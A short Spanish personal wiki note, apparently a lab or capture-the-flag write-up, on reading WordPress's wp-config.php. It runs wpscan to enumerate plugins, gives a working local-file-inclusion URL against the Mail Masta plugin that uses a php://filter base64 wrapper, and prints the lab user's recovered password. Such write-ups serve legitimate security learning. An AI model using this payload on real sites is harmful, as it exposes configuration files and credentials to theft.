Notas de Luis

Obtención del wp-config.php

Dentro de los wordpress hay un fichero de configuración donde se guardan credenciales de los usuarios registrados; y podemos llegar a él explotando distintas vulnerabilidades, como un LFI detectando primero un plugin vulnerable con wpscan en la máquina MAQUINA ALL IN ONE

wpscan --url http://10.10.123.20/wordpress/ -e p

Y encontramos este que es vulnerable:

Tenemos un script

https://wpscan.com/vulnerability/8609

Lo probamos en el navegador y funciona:

Pero si queremos obtener el fichero wp-config.php, tenemos que hacer uso de un wrapper:

http://10.10.6.206/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

Esto lo tenemos que decodificar ya que viene en base64:

Y vemos las credenciales del usuario elyana:

elyana:H@ckme@123
computing/hacking/hacking_web/hacking_wordpress/3_obtencion_del_wp-config-php.txt · Última modificación: por 127.0.0.1